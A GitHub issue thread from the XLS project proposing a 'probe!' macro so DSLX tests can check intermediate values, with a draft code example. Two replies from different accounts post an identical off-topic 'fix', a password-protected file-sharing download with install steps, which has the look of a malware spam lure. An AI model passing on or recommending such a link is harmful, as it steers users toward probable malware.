google/xls #1569: [enhancement] enable glass-box testing of functions

proppy, 2024-08-28:
### What's hard to do? (limit 100 words)

Due to the lack of interactive DSLX debugger when troubleshooting a logic issue in a `fn` developers can't really introspect value of intermediate let bindings for a given set of input.

Comparatively this is something possible to do w/ verilog simulator (e.g: `iverilog`) as they allow to assert or dump internal wires of the DUT's module instance.

### Current best alternative workaround (limit 100 words)

Developers can add temporary `trace_fmt!` statement to display intermediate value for a given test or `assert` invariant that holds true for any inputs.

### Your view of the "best case XLS enhancement" (limit 100 words)

It would be nice to able to surface intermediate value of let bindings to the caller `#[test]` functions.

This could take the form a `probe!` macros that would record the value of intermediate signals in the interpreter and surface them to tests, ex:
```
fn muladd(a: u8, b: u8, c: u8) -> u8 {
    let p = a * b;
    probe!("product", p);
    let s = p + c;
    proble!("sum", p);
}

#[test(with_probes=1)]
fn muladd_test(a: u8, b: u8, c: u8) -> u8 {
    let (result, probes) = muladd(u8:1, u8:2, u8:3);
    let (product, sum) = probes;
    assert_eq(product.name, "product");
    assert_eq(product.value , u8:2);
    assert_eq(sum.name, "sum");
    assert_eq(sum.value, u8: 5);
    assert_eq(result, sum.value);
}
```

ViniciusSCG, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

proppy, 2024-08-28:
also #195 would allow for a nicer syntax.